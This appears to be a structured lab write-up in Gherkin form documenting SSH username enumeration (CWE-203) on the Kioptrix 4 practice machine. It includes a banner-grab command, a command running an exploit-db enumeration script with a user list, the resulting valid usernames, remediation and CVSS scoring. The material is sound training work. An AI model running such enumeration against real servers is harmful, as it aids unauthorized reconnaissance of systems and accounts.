## Version 1.4.1
## language: en

Feature:
  TOE:
    Kioptrix 4
  Category:
   Information Exposure
  Location:
    Kioptrix4
  CWE:
    CWE-203: Observable Discrepancy
  Rule:
    REQ.0225. System responses to authentication failures should not indicate
    which part of the authentication was unsuccessful.
  Goal:
    Enumerate valid users
  Recommendation:
    Update the server to the most recent version

  Background:
  Hacker's software:
    |<software name>       | <version>      |
    | Kali Linux           | 2018.3         |
    | OpenSSH              | 7.7p1          |
  TOE information:
    Given I am accessing the server 192.168.60.130 through SSH
    And allows me to connect with given credentials

  Scenario: Normal use case:
    Given I am accessing the server 192.168.60.130 through SSH
    And allows me to connect with given credentials
    Then I execute commands as a low privilege user
    Then I get the LigGoat Shell

  Scenario: Static detection:
    Given I open the TOE
    Then I can see that the source code is inaccessible

  Scenario: Dynamic detection:
    Given I am accessing the server 192.168.60.130 through SSH
    And allows me to connect with given credentials
    Then I execute the following command
    """
    nc -v 192.168.60.130 22
    """
    Then I see that the SSH version is "SSH-2.0-OpenSSH_4.7p1"
    And I search for vulnerabilities for this version
    And I find the following
    """
    https://www.exploit-db.com/exploits/45233
    """

  Scenario: Exploitation
    Given I know the SSH version
    Then I download the exploit from
    """
    https://www.exploit-db.com/exploits/45233
    """
    And execute it with python with a user list file
    """
    python meh.py --userList users.txt 192.168.60.130 --outputFile found.txt
    [+] Results successfully written to found.txt in List form.
    """
    Then I find some users
    """
    root is a valid user!
    admin is not a valid user!
    test is not a valid user!
    guest is not a valid user!
    info is not a valid user!
    adm is not a valid user!
    mysql is a valid user!
    user is not a valid user!
    administrator is not a valid user!
    oracle is not a valid user!
    ftp is not a valid user!
    pi is not a valid user!
    puppet is not a valid user!
    ansible is not a valid user!
    ec2-user is not a valid user!
    vagrant is not a valid user!
    azureuser is not a valid user!
    john is a valid user!
    robert is a valid user!
    """

  Scenario: Remediation
    Update the server to the most recent version

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.3/10 (Medium) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    5.1/10 (Medium) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    5.8/10 (Medium) - CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:L/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2020-04-06
